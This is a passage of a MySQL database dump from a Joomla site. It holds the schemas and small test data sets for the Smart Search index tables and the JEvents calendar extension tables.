DISABLE KEYS */; /*!40000 ALTER TABLE `jos_finder_links_terms2` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_finder_links_terms3` -- DROP TABLE IF EXISTS `jos_finder_links_terms3`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_finder_links_terms3` ( `link_id` int(10) unsigned NOT NULL, `term_id` int(10) unsigned NOT NULL, `weight` float unsigned NOT NULL, PRIMARY KEY (`link_id`,`term_id`), KEY `idx_term_weight` (`term_id`,`weight`), KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_finder_links_terms3` -- LOCK TABLES `jos_finder_links_terms3` WRITE; /*!40000 ALTER TABLE `jos_finder_links_terms3` DISABLE KEYS */; INSERT INTO `jos_finder_links_terms3` VALUES (1,21,0.9334),(2,21,0.9334),(1,22,3.1334),(2,22,3.1334),(1,23,3.6),(2,23,3.6); /*!40000 ALTER TABLE `jos_finder_links_terms3` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_finder_links_terms4` -- DROP TABLE IF EXISTS `jos_finder_links_terms4`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_finder_links_terms4` ( `link_id` int(10) unsigned NOT NULL, `term_id` int(10) unsigned NOT NULL, `weight` float unsigned NOT NULL, PRIMARY KEY (`link_id`,`term_id`), KEY `idx_term_weight` (`term_id`,`weight`), KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_finder_links_terms4` -- LOCK TABLES `jos_finder_links_terms4` WRITE; /*!40000 ALTER TABLE `jos_finder_links_terms4` DISABLE KEYS */; INSERT INTO `jos_finder_links_terms4` VALUES (1,9,1.2),(2,9,1.2),(1,10,3.1334),(2,10,3.1334),(1,11,3.8),(2,11,3.8),(1,32,0.74662),(1,33,1.96),(1,34,2.19338); /*!40000 ALTER TABLE `jos_finder_links_terms4` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_finder_links_terms5` -- DROP TABLE IF EXISTS `jos_finder_links_terms5`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_finder_links_terms5` ( `link_id` int(10) unsigned NOT NULL, `term_id` int(10) unsigned NOT NULL, `weight` float unsigned NOT NULL, PRIMARY KEY (`link_id`,`term_id`), KEY `idx_term_weight` (`term_id`,`weight`), KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_finder_links_terms5` -- LOCK TABLES `jos_finder_links_terms5` WRITE; /*!40000 ALTER TABLE `jos_finder_links_terms5` DISABLE KEYS */; /*!40000 ALTER TABLE `jos_finder_links_terms5` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_finder_links_terms6` -- DROP TABLE IF EXISTS `jos_finder_links_terms6`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_finder_links_terms6` ( `link_id` int(10) unsigned NOT NULL, `term_id` int(10) unsigned NOT NULL, `weight` float unsigned NOT NULL, PRIMARY KEY (`link_id`,`term_id`), KEY `idx_term_weight` (`term_id`,`weight`), KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_finder_links_terms6` -- LOCK TABLES `jos_finder_links_terms6` WRITE; /*!40000 ALTER TABLE `jos_finder_links_terms6` DISABLE KEYS */; INSERT INTO `jos_finder_links_terms6` VALUES (1,40,0.46662); /*!40000 ALTER TABLE `jos_finder_links_terms6` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_finder_links_terms7` -- DROP TABLE IF EXISTS `jos_finder_links_terms7`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_finder_links_terms7` ( `link_id` int(10) unsigned NOT NULL, `term_id` int(10) unsigned NOT NULL, `weight` float unsigned NOT NULL, PRIMARY KEY (`link_id`,`term_id`), KEY `idx_term_weight` (`term_id`,`weight`), KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_finder_links_terms7` -- LOCK TABLES `jos_finder_links_terms7` WRITE; /*!40000 ALTER TABLE `jos_finder_links_terms7` DISABLE KEYS */; /*!40000 ALTER TABLE `jos_finder_links_terms7` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_finder_links_terms8` -- DROP TABLE IF EXISTS `jos_finder_links_terms8`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_finder_links_terms8` ( `link_id` int(10) unsigned NOT NULL, `term_id` int(10) unsigned NOT NULL, `weight` float unsigned NOT NULL, PRIMARY KEY (`link_id`,`term_id`), KEY `idx_term_weight` (`term_id`,`weight`), KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_finder_links_terms8` -- LOCK TABLES `jos_finder_links_terms8` WRITE; /*!40000 ALTER TABLE `jos_finder_links_terms8` DISABLE KEYS */; INSERT INTO `jos_finder_links_terms8` VALUES (1,12,0.8),(2,12,0.8),(1,13,2.7334),(2,13,2.7334),(1,14,2.9334),(2,14,2.9334),(1,18,1.2),(2,18,1.2),(1,19,3.0666),(2,19,3.0666),(1,20,3.4),(2,20,3.4),(2,31,0.56004),(1,37,0.28),(1,38,1.77338),(1,39,2.05338); /*!40000 ALTER TABLE `jos_finder_links_terms8` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_finder_links_terms9` -- DROP TABLE IF EXISTS `jos_finder_links_terms9`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_finder_links_terms9` ( `link_id` int(10) unsigned NOT NULL, `term_id` int(10) unsigned NOT NULL, `weight` float unsigned NOT NULL, PRIMARY KEY (`link_id`,`term_id`), KEY `idx_term_weight` (`term_id`,`weight`), KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_finder_links_terms9` -- LOCK TABLES `jos_finder_links_terms9` WRITE; /*!40000 ALTER TABLE `jos_finder_links_terms9` DISABLE KEYS */; /*!40000 ALTER TABLE `jos_finder_links_terms9` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_finder_links_termsa` -- DROP TABLE IF EXISTS `jos_finder_links_termsa`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_finder_links_termsa` ( `link_id` int(10) unsigned NOT NULL, `term_id` int(10) unsigned NOT NULL, `weight` float unsigned NOT NULL, PRIMARY KEY (`link_id`,`term_id`), KEY `idx_term_weight` (`term_id`,`weight`), KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_finder_links_termsa` -- LOCK TABLES `jos_finder_links_termsa` WRITE; /*!40000 ALTER TABLE `jos_finder_links_termsa` DISABLE KEYS */; /*!40000 ALTER TABLE `jos_finder_links_termsa` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_finder_links_termsb` -- DROP TABLE IF EXISTS `jos_finder_links_termsb`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_finder_links_termsb` ( `link_id` int(10) unsigned NOT NULL, `term_id` int(10) unsigned NOT NULL, `weight` float unsigned NOT NULL, PRIMARY KEY (`link_id`,`term_id`), KEY `idx_term_weight` (`term_id`,`weight`), KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_finder_links_termsb` -- LOCK TABLES `jos_finder_links_termsb` WRITE; /*!40000 ALTER TABLE `jos_finder_links_termsb` DISABLE KEYS */; /*!40000 ALTER TABLE `jos_finder_links_termsb` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_finder_links_termsc` -- DROP TABLE IF EXISTS `jos_finder_links_termsc`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_finder_links_termsc` ( `link_id` int(10) unsigned NOT NULL, `term_id` int(10) unsigned NOT NULL, `weight` float unsigned NOT NULL, PRIMARY KEY (`link_id`,`term_id`), KEY `idx_term_weight` (`term_id`,`weight`), KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_finder_links_termsc` -- LOCK TABLES `jos_finder_links_termsc` WRITE; /*!40000 ALTER TABLE `jos_finder_links_termsc` DISABLE KEYS */; INSERT INTO `jos_finder_links_termsc` VALUES (1,1,0.4),(2,1,0.4),(1,2,2.3334),(2,2,2.3334),(1,3,0.51),(2,3,0.51),(2,4,0.98),(1,5,0.4),(2,5,0.4),(1,6,0.8),(2,6,0.8),(1,7,2.4666),(2,7,2.4666),(1,8,2.6666),(2,8,2.6666),(2,28,2.4666),(2,29,0.2),(2,30,2.2666); /*!40000 ALTER TABLE `jos_finder_links_termsc` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_finder_links_termsd` -- DROP TABLE IF EXISTS `jos_finder_links_termsd`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_finder_links_termsd` ( `link_id` int(10) unsigned NOT NULL, `term_id` int(10) unsigned NOT NULL, `weight` float unsigned NOT NULL, PRIMARY KEY (`link_id`,`term_id`), KEY `idx_term_weight` (`term_id`,`weight`), KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_finder_links_termsd` -- LOCK TABLES `jos_finder_links_termsd` WRITE; /*!40000 ALTER TABLE `jos_finder_links_termsd` DISABLE KEYS */; /*!40000 ALTER TABLE `jos_finder_links_termsd` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_finder_links_termse` -- DROP TABLE IF EXISTS `jos_finder_links_termse`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_finder_links_termse` ( `link_id` int(10) unsigned NOT NULL, `term_id` int(10) unsigned NOT NULL, `weight` float unsigned NOT NULL, PRIMARY KEY (`link_id`,`term_id`), KEY `idx_term_weight` (`term_id`,`weight`), KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_finder_links_termse` -- LOCK TABLES `jos_finder_links_termse` WRITE; /*!40000 ALTER TABLE `jos_finder_links_termse` DISABLE KEYS */; INSERT INTO `jos_finder_links_termse` VALUES (2,15,0.39996),(1,15,0.86658),(2,16,0.68),(2,17,2.26661),(1,24,0.45339),(2,24,0.82677),(2,25,1.96),(2,26,2.32339),(2,27,2.55),(1,35,2.05338),(1,36,2.24),(1,41,2.15339),(1,42,0.65338),(1,43,2.00662),(1,44,2.42662),(1,45,0.37338),(1,46,1.86662); /*!40000 ALTER TABLE `jos_finder_links_termse` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_finder_links_termsf` -- DROP TABLE IF EXISTS `jos_finder_links_termsf`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_finder_links_termsf` ( `link_id` int(10) unsigned NOT NULL, `term_id` int(10) unsigned NOT NULL, `weight` float unsigned NOT NULL, PRIMARY KEY (`link_id`,`term_id`), KEY `idx_term_weight` (`term_id`,`weight`), KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_finder_links_termsf` -- LOCK TABLES `jos_finder_links_termsf` WRITE; /*!40000 ALTER TABLE `jos_finder_links_termsf` DISABLE KEYS */; /*!40000 ALTER TABLE `jos_finder_links_termsf` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_finder_taxonomy` -- DROP TABLE IF EXISTS `jos_finder_taxonomy`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_finder_taxonomy` ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT, `parent_id` int(10) unsigned NOT NULL DEFAULT '0', `title` varchar(255) NOT NULL, `state` tinyint(1) unsigned NOT NULL DEFAULT '1', `access` tinyint(1) unsigned NOT NULL DEFAULT '0', `ordering` tinyint(1) unsigned NOT NULL DEFAULT '0', PRIMARY KEY (`id`), KEY `parent_id` (`parent_id`), KEY `state` (`state`), KEY `ordering` (`ordering`), KEY `access` (`access`), KEY `idx_parent_published` (`parent_id`,`state`,`access`) ) ENGINE=InnoDB AUTO_INCREMENT=7 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_finder_taxonomy` -- LOCK TABLES `jos_finder_taxonomy` WRITE; /*!40000 ALTER TABLE `jos_finder_taxonomy` DISABLE KEYS */; INSERT INTO `jos_finder_taxonomy` VALUES (1,0,'ROOT',0,0,0),(2,1,'Type',1,1,0),(3,2,'Event',1,1,0),(4,1,'Category',1,1,0),(5,4,'',0,0,0),(6,4,'DEFAULT',1,1,0); /*!40000 ALTER TABLE `jos_finder_taxonomy` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_finder_taxonomy_map` -- DROP TABLE IF EXISTS `jos_finder_taxonomy_map`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_finder_taxonomy_map` ( `link_id` int(10) unsigned NOT NULL, `node_id` int(10) unsigned NOT NULL, PRIMARY KEY (`link_id`,`node_id`), KEY `link_id` (`link_id`), KEY `node_id` (`node_id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_finder_taxonomy_map` -- LOCK TABLES `jos_finder_taxonomy_map` WRITE; /*!40000 ALTER TABLE `jos_finder_taxonomy_map` DISABLE KEYS */; INSERT INTO `jos_finder_taxonomy_map` VALUES (1,3),(1,5),(2,3),(2,6); /*!40000 ALTER TABLE `jos_finder_taxonomy_map` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_finder_terms` -- DROP TABLE IF EXISTS `jos_finder_terms`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_finder_terms` ( `term_id` int(10) unsigned NOT NULL AUTO_INCREMENT, `term` varchar(75) NOT NULL, `stem` varchar(75) NOT NULL, `common` tinyint(1) unsigned NOT NULL DEFAULT '0', `phrase` tinyint(1) unsigned NOT NULL DEFAULT '0', `weight` float unsigned NOT NULL DEFAULT '0', `soundex` varchar(75) NOT NULL, `links` int(10) NOT NULL DEFAULT '0', `language` char(3) NOT NULL DEFAULT '', PRIMARY KEY (`term_id`), UNIQUE KEY `idx_term` (`term`), KEY `idx_term_phrase` (`term`,`phrase`), KEY `idx_stem_phrase` (`stem`,`phrase`), KEY `idx_soundex_phrase` (`soundex`,`phrase`) ) ENGINE=InnoDB AUTO_INCREMENT=47 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_finder_terms` -- LOCK TABLES `jos_finder_terms` WRITE; /*!40000 ALTER TABLE `jos_finder_terms` DISABLE KEYS */; INSERT INTO `jos_finder_terms` VALUES (1,'06','06',0,0,0.2,'',4,'*'),(2,'06 13','06 13',0,1,1.1667,'',4,'*'),(3,'123','123',0,0,0.3,'',4,'*'),(4,'1234567','1234567',0,0,0.7,'',3,'*'),(5,'13','13',0,0,0.2,'',4,'*'),(6,'2013','2013',0,0,0.4,'',4,'*'),(7,'2013 06','2013 06',0,1,1.2333,'',4,'*'),(8,'2013 06 13','2013 06 13',0,1,1.3333,'',4,'*'),(9,'component','compon',0,0,0.6,'C5153',4,'*'),(10,'component jevents','compon jevents',0,1,1.5667,'C515321532',4,'*'),(11,'component jevents icalevent','compon jevents icalevent',0,1,1.9,'C5153215324153',4,'*'),(12,'detail','detail',0,0,0.4,'D400',4,'*'),(13,'detail 2013','detail 2013',0,1,1.3667,'D400',4,'*'),(14,'detail 2013 06','detail 2013 06',0,1,1.4667,'D400',4,'*'),(15,'event','event',0,0,0.3333,'E153',4,'*'),(16,'events','event',0,0,0.4,'E1532',3,'*'),(17,'events 123','event 123',0,1,1.3333,'E1532',3,'*'),(18,'icalevent','icalev',0,0,0.6,'I24153',4,'*'),(19,'icalevent detail','icalev detail',0,1,1.5333,'I241534',4,'*'),(20,'icalevent detail 2013','icalev detail 2013',0,1,1.7,'I241534',4,'*'),(21,'jevents','jevent',0,0,0.4667,'J1532',4,'*'),(22,'jevents icalevent','jevent icalevent',0,1,1.5667,'J15324153',4,'*'),(23,'jevents icalevent detail','jevent icalevent detail',0,1,1.8,'J153241534',4,'*'),(24,'test','test',0,0,0.2667,'T230',4,'*'),(25,'test 1234567','test 1234567',0,1,1.4,'T230',3,'*'),(26,'test events','test events',0,1,1.3667,'T231532',3,'*'),(27,'test events 123','test events 123',0,1,1.5,'T231532',3,'*'),(28,'06 13 1','06 13 1',0,1,1.2333,'',2,'*'),(29,'1','1',0,0,0.1,'',2,'*'),(30,'13 1','13 1',0,1,1.1333,'',2,'*'),(31,'default','default',0,0,0.4667,'D143',2,'*'),(32,'calendar','calendar',0,0,0.5333,'C4536',1,'*'),(33,'calendar for','calendar for',0,1,1.4,'C453616',1,'*'),(34,'calendar for this','calendar for this',0,1,1.5667,'C45361632',1,'*'),(35,'event calendar','event calendar',0,1,1.4667,'E15324536',1,'*'),(36,'event calendar for','event calendar for',0,1,1.6,'E1532453616',1,'*'),(37,'for','for',0,0,0.2,'F600',1,'*'),(38,'for this','for this',0,1,1.2667,'F632',1,'*'),(39,'for this month','for this month',0,1,1.4667,'F63253',1,'*'),(40,'month','month',0,0,0.3333,'M300',1,'*'),(41,'test 123','test 123',0,1,1.2667,'T230',1,'*'),(42,'testing','test',0,0,0.4667,'T2352',1,'*'),(43,'testing event','test event',0,1,1.4333,'T2352153',1,'*'),(44,'testing event calendar','test event calendar',0,1,1.7333,'T235215324536',1,'*'),(45,'this','thi',0,0,0.2667,'T200',1,'*'),(46,'this month','thi month',0,1,1.3333,'T253',1,'*'); /*!40000 ALTER TABLE `jos_finder_terms` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_finder_terms_common` -- DROP TABLE IF EXISTS `jos_finder_terms_common`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_finder_terms_common` ( `term` varchar(75) NOT NULL, `language` varchar(3) NOT NULL, KEY `idx_word_lang` (`term`,`language`), KEY `idx_lang` (`language`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_finder_terms_common` -- LOCK TABLES `jos_finder_terms_common` WRITE; /*!40000 ALTER TABLE `jos_finder_terms_common` DISABLE KEYS */; INSERT INTO `jos_finder_terms_common` VALUES ('a','en'),('about','en'),('after','en'),('ago','en'),('all','en'),('am','en'),('an','en'),('and','en'),('ani','en'),('any','en'),('are','en'),('aren\'t','en'),('as','en'),('at','en'),('be','en'),('but','en'),('by','en'),('for','en'),('from','en'),('get','en'),('go','en'),('how','en'),('if','en'),('in','en'),('into','en'),('is','en'),('isn\'t','en'),('it','en'),('its','en'),('me','en'),('more','en'),('most','en'),('must','en'),('my','en'),('new','en'),('no','en'),('none','en'),('not','en'),('noth','en'),('nothing','en'),('of','en'),('off','en'),('often','en'),('old','en'),('on','en'),('onc','en'),('once','en'),('onli','en'),('only','en'),('or','en'),('other','en'),('our','en'),('ours','en'),('out','en'),('over','en'),('page','en'),('she','en'),('should','en'),('small','en'),('so','en'),('some','en'),('than','en'),('thank','en'),('that','en'),('the','en'),('their','en'),('theirs','en'),('them','en'),('then','en'),('there','en'),('these','en'),('they','en'),('this','en'),('those','en'),('thus','en'),('time','en'),('times','en'),('to','en'),('too','en'),('true','en'),('under','en'),('until','en'),('up','en'),('upon','en'),('use','en'),('user','en'),('users','en'),('veri','en'),('version','en'),('very','en'),('via','en'),('want','en'),('was','en'),('way','en'),('were','en'),('what','en'),('when','en'),('where','en'),('whi','en'),('which','en'),('who','en'),('whom','en'),('whose','en'),('why','en'),('wide','en'),('will','en'),('with','en'),('within','en'),('without','en'),('would','en'),('yes','en'),('yet','en'),('you','en'),('your','en'),('yours','en'); /*!40000 ALTER TABLE `jos_finder_terms_common` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_finder_tokens` -- DROP TABLE IF EXISTS `jos_finder_tokens`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_finder_tokens` ( `term` varchar(75) NOT NULL, `stem` varchar(75) NOT NULL, `common` tinyint(1) unsigned NOT NULL DEFAULT '0', `phrase` tinyint(1) unsigned NOT NULL DEFAULT '0', `weight` float unsigned NOT NULL DEFAULT '1', `context` tinyint(1) unsigned NOT NULL DEFAULT '2', `language` char(3) NOT NULL DEFAULT '', KEY `idx_word` (`term`), KEY `idx_context` (`context`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_finder_tokens` -- LOCK TABLES `jos_finder_tokens` WRITE; /*!40000 ALTER TABLE `jos_finder_tokens` DISABLE KEYS */; /*!40000 ALTER TABLE `jos_finder_tokens` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_finder_tokens_aggregate` -- DROP TABLE IF EXISTS `jos_finder_tokens_aggregate`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_finder_tokens_aggregate` ( `term_id` int(10) unsigned NOT NULL, `map_suffix` char(1) NOT NULL, `term` varchar(75) NOT NULL, `stem` varchar(75) NOT NULL, `common` tinyint(1) unsigned NOT NULL DEFAULT '0', `phrase` tinyint(1) unsigned NOT NULL DEFAULT '0', `term_weight` float unsigned NOT NULL, `context` tinyint(1) unsigned NOT NULL DEFAULT '2', `context_weight` float unsigned NOT NULL, `total_weight` float unsigned NOT NULL, `language` char(3) NOT NULL DEFAULT '', KEY `token` (`term`), KEY `keyword_id` (`term_id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_finder_tokens_aggregate` -- LOCK TABLES `jos_finder_tokens_aggregate` WRITE; /*!40000 ALTER TABLE `jos_finder_tokens_aggregate` DISABLE KEYS */; /*!40000 ALTER TABLE `jos_finder_tokens_aggregate` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_finder_types` -- DROP TABLE IF EXISTS `jos_finder_types`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_finder_types` ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT, `title` varchar(100) NOT NULL, `mime` varchar(100) NOT NULL, PRIMARY KEY (`id`), UNIQUE KEY `title` (`title`) ) ENGINE=InnoDB AUTO_INCREMENT=8 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_finder_types` -- LOCK TABLES `jos_finder_types` WRITE; /*!40000 ALTER TABLE `jos_finder_types` DISABLE KEYS */; INSERT INTO `jos_finder_types` VALUES (1,'Tag',''),(2,'Event',''),(3,'Category',''),(4,'Contact',''),(5,'Article',''),(6,'News Feed',''),(7,'Web Link',''); /*!40000 ALTER TABLE `jos_finder_types` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_jev_defaults` -- DROP TABLE IF EXISTS `jos_jev_defaults`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_jev_defaults` ( `id` int(11) unsigned NOT NULL AUTO_INCREMENT, `title` varchar(100) NOT NULL DEFAULT '', `name` varchar(50) NOT NULL DEFAULT '', `subject` text NOT NULL, `value` text NOT NULL, `state` tinyint(3) NOT NULL DEFAULT '1', `params` text NOT NULL, `language` varchar(20) NOT NULL DEFAULT '*', PRIMARY KEY (`id`), KEY `name` (`name`) ) ENGINE=InnoDB AUTO_INCREMENT=5 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_jev_defaults` -- LOCK TABLES `jos_jev_defaults` WRITE; /*!40000 ALTER TABLE `jos_jev_defaults` DISABLE KEYS */; INSERT INTO `jos_jev_defaults` VALUES (1,'JEV_EVENT_DETAIL_PAGE','icalevent.detail_body','','',0,'','*'),(2,'JEV_EVENT_LIST_ROW','icalevent.list_row','','',0,'','*'),(3,'JEV_EVENT_MONTH_CALENDAR_CELL','month.calendar_cell','','',0,'','*'),(4,'JEV_EVENT_MONTH_CALENDAR_TIP','month.calendar_tip','','',0,'','*'); /*!40000 ALTER TABLE `jos_jev_defaults` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_jev_users` -- DROP TABLE IF EXISTS `jos_jev_users`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_jev_users` ( `id` int(11) unsigned NOT NULL AUTO_INCREMENT, `user_id` int(11) NOT NULL DEFAULT '0', `published` tinyint(2) NOT NULL DEFAULT '0', `canuploadimages` tinyint(2) NOT NULL DEFAULT '0', `canuploadmovies` tinyint(2) NOT NULL DEFAULT '0', `cancreate` tinyint(2) NOT NULL DEFAULT '0', `canedit` tinyint(2) NOT NULL DEFAULT '0', `canpublishown` tinyint(2) NOT NULL DEFAULT '0', `candeleteown` tinyint(2) NOT NULL DEFAULT '0', `canpublishall` tinyint(2) NOT NULL DEFAULT '0', `candeleteall` tinyint(2) NOT NULL DEFAULT '0', `cancreateown` tinyint(2) NOT NULL DEFAULT '0', `cancreateglobal` tinyint(2) NOT NULL DEFAULT '0', `eventslimit` int(11) NOT NULL DEFAULT '0', `extraslimit` int(11) NOT NULL DEFAULT '0', `categories` varchar(255) NOT NULL DEFAULT '', `calendars` varchar(255) NOT NULL DEFAULT '', `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', PRIMARY KEY (`id`), KEY `user` (`user_id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_jev_users` -- LOCK TABLES `jos_jev_users` WRITE; /*!40000 ALTER TABLE `jos_jev_users` DISABLE KEYS */; /*!40000 ALTER TABLE `jos_jev_users` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_jevents_catmap` -- DROP TABLE IF EXISTS `jos_jevents_catmap`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_jevents_catmap` ( `evid` int(12) NOT NULL AUTO_INCREMENT, `catid` int(11) NOT NULL DEFAULT '1', `ordering` int(5) unsigned NOT NULL DEFAULT '0', UNIQUE KEY `key_event_category` (`evid`,`catid`) ) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_jevents_catmap` -- LOCK TABLES `jos_jevents_catmap` WRITE; /*!40000 ALTER TABLE `jos_jevents_catmap` DISABLE KEYS */; INSERT INTO `jos_jevents_catmap` VALUES (2,10,0); /*!40000 ALTER TABLE `jos_jevents_catmap` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_jevents_exception` -- DROP TABLE IF EXISTS `jos_jevents_exception`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_jevents_exception` ( `ex_id` int(12) NOT NULL AUTO_INCREMENT, `rp_id` int(12) NOT NULL DEFAULT '0', `eventid` int(12) NOT NULL DEFAULT '1', `eventdetail_id` int(12) NOT NULL DEFAULT '0', `exception_type` int(2) NOT NULL DEFAULT '0', `startrepeat` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `oldstartrepeat` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `tempfield` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', PRIMARY KEY (`ex_id`), KEY `eventid` (`eventid`), KEY 